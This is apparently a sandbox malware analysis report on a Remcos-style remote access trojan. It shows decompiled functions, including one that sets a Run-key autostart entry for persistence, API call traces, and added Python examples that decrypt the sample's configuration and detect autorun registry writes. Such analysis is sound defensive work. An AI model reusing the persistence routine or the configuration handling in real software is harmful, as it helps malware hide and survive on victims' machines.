                                        • Opcode Fuzzy Hash: c242165edecd777d466082f244190311df4795ce01b8674b0afa1ef32b865684
                                        • Instruction Fuzzy Hash: 5B314971A0010DEFCF04DFA4E9999EEBBB9FF88315B10416AE916A3290DB746F04CB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%
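The routine above reads a blob laid out as one length byte, a first block of that length, and a remainder; it initialises a local state from the first block and then transforms the remainder into a string. The subcall references show the blob comes from the RCDATA resource named SETTINGS (FindResourceA type 0x0A). The following is an added example, not code from the report or from Remcos, that parses that layout and recovers the body. Assumptions: the page does not name the cipher, and RC4 is assumed here because the call pattern (a state block initialised from a key, then a byte-wise transform of the data) matches RC4's key schedule and keystream phases; the key and configuration string in the demo are constructed placeholders, and the pefile helper for pulling the resource out of a binary is not exercised by the offline demo.

```python
"""Added example (not the report's or Remcos's code): parse a SETTINGS-style
blob laid out as <1-byte key length><key><encrypted body>, as the decompiled
routine reads it, and recover the body with RC4 (assumed cipher)."""
from typing import Optional, Tuple


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # keystream generation, XORed into the data
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def split_settings(blob: bytes) -> Tuple[bytes, bytes]:
    """Split <keylen><key><body> the way the decompiled routine does: the first
    byte is the key length, the key follows, everything after it is the body."""
    if len(blob) < 2:
        raise ValueError("blob too short to hold a length byte and a key")
    key_len = blob[0]
    if key_len == 0 or 1 + key_len > len(blob):
        raise ValueError(f"bad key length {key_len} for a blob of {len(blob)} bytes")
    key = blob[1:1 + key_len]
    body = blob[1 + key_len:]
    return key, body


def decrypt_settings(blob: bytes) -> bytes:
    """Recover the body; with RC4 the same routine also re-encrypts."""
    key, body = split_settings(blob)
    return rc4(key, body)


def settings_from_pe(path: str, name: str = "SETTINGS") -> Optional[bytes]:
    """Pull the named RT_RCDATA (type 10) resource out of a PE with pefile
    (third-party; not needed for the offline demo). Returns None if absent."""
    import pefile  # pip install pefile
    pe = pefile.PE(path)
    if not hasattr(pe, "DIRECTORY_ENTRY_RESOURCE"):
        return None
    for type_entry in pe.DIRECTORY_ENTRY_RESOURCE.entries:
        if type_entry.id != pefile.RESOURCE_TYPE["RT_RCDATA"]:
            continue
        for name_entry in type_entry.directory.entries:
            if name_entry.name is None or str(name_entry.name).upper() != name.upper():
                continue
            data_entry = name_entry.directory.entries[0].data
            return pe.get_data(data_entry.struct.OffsetToData, data_entry.struct.Size)
    return None


# Constructed demo input (placeholders, not taken from the sample), packed into
# the same <keylen><key><body> layout the routine above consumes.
SAMPLE_KEY = b"demo-key"
SAMPLE_CONFIG = b"host=c2.example.invalid;port=4782;mutex=demo"
SAMPLE_BLOB = bytes([len(SAMPLE_KEY)]) + SAMPLE_KEY + rc4(SAMPLE_KEY, SAMPLE_CONFIG)

if __name__ == "__main__":
    print(decrypt_settings(SAMPLE_BLOB).decode())
```

If the recovered body is not printable text, the cipher assumption is wrong for this build; `split_settings` still gives the key and body to try other transforms on.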

                                        C-Code - Quality: 28%
                                         			E0040B7B9(void* _a4, void* _a8, short* _a12, void* _a16, int _a32) {
                                         				long _t15;
                                         				short* _t16;
                                         				long _t17;
                                         				long _t18;
                                         				void* _t21;
                                         				int _t22;
                                         				void* _t28;
                                         
                                         				// Open or create the key; _a8 is reused to receive the HKEY. The API references below show
                                         				// HKEY_LOCAL_MACHINE (0x80000002) and Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\.
                                         				_t15 = RegCreateKeyW(_a4, _a8,  &_a8); // executed
                                         				if(_t15 != 0) {
                                         					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                         					return 0;
                                         				} else {
                                         					// The decompiler dropped the eax results of length() and c_str(); reconstructed here from the
                                         					// RegSetValueExW prototype (hKey, lpValueName, Reserved, dwType, lpData, cbData).
                                         					_t15 = __imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ(_t28, _t21);
                                         					_t17 = _t15 + _t15 + 2; // byte count: two bytes per UTF-16 unit plus the terminating null
                                         					_t16 = __imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                         					_t22 = 0;
                                         					_t18 = RegSetValueExW(_a8, _a12, 0, _a32, _t16, _t17); // executed; _a32 is the value type
                                         					RegCloseKey(_a8);
                                         					if(_t18 == 0) {
                                         						_t22 = 1; // success
                                         					}
                                         					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                         					return _t22;
                                         				}
                                         			}

                                         Instruction address column for the listing above: 0x0040b7c6 to 0x0040b828.

                                        APIs
                                        • RegCreateKeyW.ADVAPI32(?,80000002,80000002), ref: 0040B7C6
                                        • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00415628,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28), ref: 0040B7D5
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28), ref: 0040B7E3
                                        • RegSetValueExW.KERNELBASE(80000002,00407E26,00000000,?,00000000,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24), ref: 0040B7F6
                                        • RegCloseKey.ADVAPI32(80000002,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28), ref: 0040B801
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28,00415A24), ref: 0040B810
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28,00415A24), ref: 0040B81F
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@CloseCreateValue
                                        • String ID:
                                        • API String ID: 1037601705-0
                                        • Opcode ID: e47ed06fcfe4702c07f1ce527c0755a331d7201bc4fedc9c1fec415c236eba45
                                        • Instruction ID: 16de392092bcd2de4e66c717f3c3c884efc51066479430e04c8b01777f2a524b
                                        • Opcode Fuzzy Hash: e47ed06fcfe4702c07f1ce527c0755a331d7201bc4fedc9c1fec415c236eba45
                                        • Instruction Fuzzy Hash: 4501A87204050DEFCF00AFA0EC998EA7B6DFB583597458035FD1996161D7329E14DBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%
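E0040B7B9 is the persistence writer: the API references record HKEY_LOCAL_MACHINE and Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, a logon autostart key, with the sample's own path on the stack. The block below is an added detection example, not code from the report, that runs over constructed Sysmon-style EventID 13 (SetValue) records and flags values written directly under that key; Run and RunOnce are included as a generalisation beyond the key on this page. The record format, the image paths, value names and command lines are constructed placeholders, and the matching is a suffix match from `\Microsoft\...` so that HKCU/HKU hives and Wow6432Node redirection are covered too.

```python
"""Added example (not from the report): flag registry writes that create an
autostart entry, over constructed Sysmon-style EventID 13 records."""
from typing import Dict, List, Optional, Tuple

# Compared case-insensitively against the parent key of TargetObject.
# Suffixes start at "\microsoft" so HKLM, HKCU/HKU and Wow6432Node forms all match.
AUTORUN_KEY_SUFFIXES = (
    r"\microsoft\windows\currentversion\policies\explorer\run",  # key used by this sample
    r"\microsoft\windows\currentversion\run",                    # generalisation
    r"\microsoft\windows\currentversion\runonce",                # generalisation
)

# Payloads dropped by a RAT usually live in user-writable paths; raise severity there.
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")


def parse_event(line: str) -> Dict[str, str]:
    """One record per line, tab-separated key=value fields (constructed format)."""
    fields: Dict[str, str] = {}
    for part in line.rstrip("\n").split("\t"):
        key, sep, value = part.partition("=")
        if sep:
            fields[key] = value
    return fields


def autorun_key_match(target: str) -> Tuple[Optional[str], Optional[str]]:
    """(matched suffix, value name) when TargetObject is a value directly under
    an autostart key, otherwise (None, None)."""
    parent, _, value_name = target.rpartition("\\")
    lowered = parent.lower()
    for suffix in AUTORUN_KEY_SUFFIXES:
        if lowered.endswith(suffix):
            return suffix, value_name
    return None, None


def find_autorun_writes(lines) -> List[Dict[str, str]]:
    """Return one finding per SetValue event that lands in an autostart key."""
    hits: List[Dict[str, str]] = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "13" or ev.get("EventType") != "SetValue":
            continue  # only value writes; CreateKey (EventID 12) alone is not persistence
        suffix, value_name = autorun_key_match(ev.get("TargetObject", ""))
        if suffix is None:
            continue
        details = ev.get("Details", "")
        severity = "high" if any(m in details.lower() for m in USER_WRITABLE_MARKERS) else "medium"
        hits.append({
            "image": ev.get("Image", ""),
            "key": suffix,
            "value_name": value_name or "",
            "command": details,
            "severity": severity,
        })
    return hits


# Constructed records (not real telemetry); paths and value names are placeholders.
SAMPLE_EVENTS = [
    "EventID=13\tImage=C:\\Users\\user\\Desktop\\sample.exe\tEventType=SetValue\t"
    "TargetObject=HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\svc\t"
    "Details=C:\\Users\\user\\AppData\\Roaming\\svc\\svc.exe",
    "EventID=13\tImage=C:\\Users\\user\\Desktop\\sample.exe\tEventType=SetValue\t"
    "TargetObject=HKU\\S-1-5-21-1-2-3-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svc\t"
    "Details=C:\\Program Files\\Vendor\\tool.exe",
    "EventID=13\tImage=C:\\Windows\\System32\\svchost.exe\tEventType=SetValue\t"
    "TargetObject=HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden\t"
    "Details=DWORD (0x00000001)",
    "EventID=12\tImage=C:\\Users\\user\\Desktop\\sample.exe\tEventType=CreateKey\t"
    "TargetObject=HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run",
    "EventID=13\tImage=C:\\Users\\user\\Desktop\\sample.exe\tEventType=SetValue\t"
    "TargetObject=HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\upd\t"
    "Details=C:\\Users\\user\\AppData\\Local\\Temp\\upd.exe",
]

if __name__ == "__main__":
    for hit in find_autorun_writes(SAMPLE_EVENTS):
        print(hit)
```

The parent-key match deliberately ignores deeper subkeys: only values set directly under the autostart key are executed at logon, so a write to an unrelated subtree such as Explorer\Advanced is not reported.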

                                        C-Code - Quality: 100%
                                        			E00412D56(void* __ecx, void* _a4, long _a8, long _a12, intOrPtr _a16) {
                                        				long _v8;
                                        				long _v12;
                                        				intOrPtr _t14;
                                        				void* _t15;
                                        				int _t17;
                                        				struct _OVERLAPPED* _t19;
                                        				long _t22;
                                        				struct _OVERLAPPED* _t24;
                                        				void* _t28;
                                        
                                         				_t24 = 0;
                                         				_t14 = _a16;
                                         				if(_t14 == 0) {
                                         					_v12 = 0x40000000; // GENERIC_WRITE
                                         					_v8 = 2;           // CREATE_ALWAYS: overwrite the file
                                         				} else {
                                         					if(_t14 == 1) {
                                         						_t22 = 4;
                                         						_v12 = _t22;   // FILE_APPEND_DATA
                                         						_v8 = _t22;    // OPEN_ALWAYS: append to an existing file
                                         					}
                                         				}
                                         				// Any other mode leaves _v12/_v8 uninitialised (original behaviour); 0x80 is FILE_ATTRIBUTE_NORMAL
                                         				_t15 = CreateFileW(_a12, _v12, _t24, _t24, _v8, 0x80, _t24); // executed
                                         				_t28 = _t15;
                                         				if(_t28 != 0xffffffff) {
                                         					// In append mode seek to FILE_END (2) before writing
                                         					if(_a16 != 1 || SetFilePointer(_t28, _t24, _t24, 2) != 0xffffffff) {
                                         						_t17 = WriteFile(_t28, _a4, _a8,  &_a12, _t24); // executed; _a4/_a8 are the buffer and its length
                                        						if(_t17 != 0) {
                                        							_t24 = 1;
                                        						}
                                        					}
                                        					CloseHandle(_t28);
                                        					_t19 = _t24;
                                        				} else {
                                        					_t19 = 0;
                                        				}
                                        				return _t19;
                                        			}

                                         Instruction address column for the listing above: 0x00412d5f to 0x00412dde.

                                        APIs
                                        • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00412DAF
                                        • WriteFile.KERNELBASE(00000000,40000000,?,?,00000000), ref: 00412DC6
                                        • CloseHandle.KERNEL32(00000000), ref: 00412DD3
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandlePointerWrite
                                        • String ID:
                                        • API String ID: 3604237281-0
                                        • Opcode ID: b6fc8936da6e294b4790fd661f23c461e372249c0823290801eb98338cb1c386
                                        • Instruction ID: ca773920b5f39e1e62b037f934487c6bab51a0d9f38e2d78726aa57b3ce32958
                                        • Opcode Fuzzy Hash: b6fc8936da6e294b4790fd661f23c461e372249c0823290801eb98338cb1c386
                                        • Instruction Fuzzy Hash: 26118E71500508BFDF118F94ED88FEF7B6CEB05368F108222F911D6190D2B54EA09768
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(?,80000002,00000000,00020119,80000002,00000000), ref: 0040B551
                                        • RegQueryValueExA.KERNELBASE(80000002,004140D8,00000000,00000000,?,00000400), ref: 0040B56E
                                        • RegCloseKey.ADVAPI32(80000002), ref: 0040B577
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040B596
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@OpenQueryU?$char_traits@Value
                                        • String ID:
                                        • API String ID: 2462357041-0
                                        • Opcode ID: 57c7c103ff9b08e3e02a73ce7dec204de8a86c9bec5313fbbfa2b155cf811d2d
                                        • Instruction ID: f17c32bc227b8fe577d0db1d358ecf0b28a093220f684ee6c8601fb0e55a49ce
                                        • Opcode Fuzzy Hash: 57c7c103ff9b08e3e02a73ce7dec204de8a86c9bec5313fbbfa2b155cf811d2d
                                        • Instruction Fuzzy Hash: F60108B650020DFFDF01DF90DC84DEA7B6DFB48348F104462FA05A6151D7309A659BA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?c_str@?$basic_string@D@1@@V01@@
                                        • String ID:
                                        • API String ID: 2505548081-0
                                        • Opcode ID: 9697f98c185c8dbb6fe00f519fde4b1936163652de48f83fe795a14545806d9b
                                        • Instruction ID: d80b3b6c6aed89596c133f447bcdc90fdca9c0e00c1408e091cb816f9a065f40
                                        • Opcode Fuzzy Hash: 9697f98c185c8dbb6fe00f519fde4b1936163652de48f83fe795a14545806d9b
                                        • Instruction Fuzzy Hash: A5F0F23240011EEFCF04EF94DC58CEE7B78FF88255B008829F926971A0EB70AA15CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0040B4C8(void* __ecx, void* _a4, void* _a8, char* _a12, char* _a16) {
                                        				int _v8;
                                        				int _v12;
                                        				int _t14;
                                        				long _t16;
                                        				long _t20;
                                        
                                         				_t14 = 4;
                                         				_v8 = _t14;  // cbData: room for a 4-byte (DWORD-sized) value
                                         				_v12 = _t14; // lpType, overwritten with the stored value's type
                                         				_t16 = RegOpenKeyExA(_a4, _a8, 0, 0x20019,  &_a8); // executed; 0x20019 = KEY_READ, _a8 reused as the HKEY
                                         				if(_t16 != 0) {
                                         					return 0;
                                         				} else {
                                         					_t20 = RegQueryValueExA(_a8, _a12, 0,  &_v12, _a16,  &_v8); // value data written to the caller's _a16 buffer
                                         					// Decompiler rendering of "return (_t20 == ERROR_SUCCESS)" in al; the RegCloseKey result itself is not used
                                         					return RegCloseKey(_a8) & 0xffffff00 | _t20 == 0x00000000;
                                        				}
                                        			}


                                         Instruction address column for the listing above: 0x0040b4cf to 0x0040b521.

                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                        • RegQueryValueExA.ADVAPI32(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                        • RegCloseKey.ADVAPI32(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 3677997916-0
                                        • Opcode ID: 55f81898a082b856529423ab666f51d9d292b3708a6e04e50ac108d0079eece6
                                        • Instruction ID: e9b8f34285146556d923ff1311e539e3090c3a2a7499f994c32c4d3a3a900868
                                        • Opcode Fuzzy Hash: 55f81898a082b856529423ab666f51d9d292b3708a6e04e50ac108d0079eece6
                                        • Instruction Fuzzy Hash: A8F0F976900218FFDF118FA0EC06FDA7FA8EB48764F148165FA05EA150E7719A10AB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: __dllonexit_onexit
                                        • String ID:
                                        • API String ID: 2384194067-0
                                        • Opcode ID: a0f76b705919cd2b1b3505feded0ad4b759bc61fe2e2080deee93d3e34803ae7
                                        • Instruction ID: 4ade6cbf426c929272142e716342c2a11d1dea90e179e11a85702f2ae3751f82
                                        • Opcode Fuzzy Hash: a0f76b705919cd2b1b3505feded0ad4b759bc61fe2e2080deee93d3e34803ae7
                                        • Instruction Fuzzy Hash: 55C01274CC4301FBCF102B60BC866C67711B7A1B32BA087AAF565110F0C77D49A4AA0D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403C60
                                        • SetEvent.KERNEL32(?), ref: 00403C69
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00403C72
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,69D65DF0), ref: 00403C8A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00403C9B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403CAA
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00403D11
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00403D27
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00403D5F
                                          • Part of subcall function 00403816: CreateFileW.KERNEL32(0000FDE8,80000000,00000000,00000000,00000003,00000080,00000000,?,0041B310,00000000), ref: 00403845
                                          • Part of subcall function 00403816: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040385C
                                          • Part of subcall function 00403816: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403B9B
                                          • Part of subcall function 00403816: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BA4
                                          • Part of subcall function 00403816: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BAD
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 00403D7A
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Uploaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 00403DB1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00403DD6
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000004,?,?,?,?,?,?,?,00000000), ref: 00404199
                                        • atoi.MSVCRT ref: 004041A0
                                          • Part of subcall function 00403473: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664,[INFO],[DEBUG],00000000,?,004041B5,?,?,00000000), ref: 00403499
                                          • Part of subcall function 00403473: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034AC
                                          • Part of subcall function 00403473: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034B5
                                          • Part of subcall function 00403473: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034CE
                                          • Part of subcall function 00403473: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000), ref: 004034DB
                                          • Part of subcall function 00403473: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004034F0
                                          • Part of subcall function 00403473: recv.WS2_32(00000000,?,0000FDE8,00000000), ref: 00403517
                                          • Part of subcall function 00403473: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,00000000,00000000,?,0000FDE8,00000000), ref: 00403534
                                          • Part of subcall function 00403473: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 00403541
                                          • Part of subcall function 00403473: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00403556
                                          • Part of subcall function 00403473: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00403560
                                          • Part of subcall function 00403473: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000004,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403578
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004041C3
                                          • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                          • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Downloaded file size: ,00000000,?,?,?,00000000), ref: 004041E1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,Downloaded file size: ,00000000,?,?,?,00000000), ref: 004041EE
